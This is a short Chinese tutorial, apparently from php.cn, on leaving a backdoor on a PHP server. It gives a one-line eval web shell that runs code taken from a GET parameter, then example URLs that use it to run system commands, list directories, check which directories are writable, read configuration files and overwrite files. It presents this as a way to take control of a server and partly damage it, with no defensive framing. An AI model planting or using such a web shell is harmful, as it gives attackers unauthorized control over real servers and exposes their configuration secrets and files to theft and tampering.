今天我们说一些最常见的php留后门的一些用法
首先,写一个最简单的后门,也可以叫做木马。
<?php eval($_GET['evl']);
就这样,你已经获得了这台服务器上的很多执行权限。
那场景的用法有哪些呢?
打印服务器phpinfo
立即学习“PHP免费学习笔记(深入)”;
http://www.test.com/a.php?evl=phpinfo()
查看某个目录下有什么文件
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));获取某个文件的内容,一般用来读取配置
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));对某个可写目录进行写文件
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。
以上就是PHP后门的一些用法的详细内容,更多请关注php中文网其它相关文章!
PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!
广告
收藏
收藏
收藏
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
911
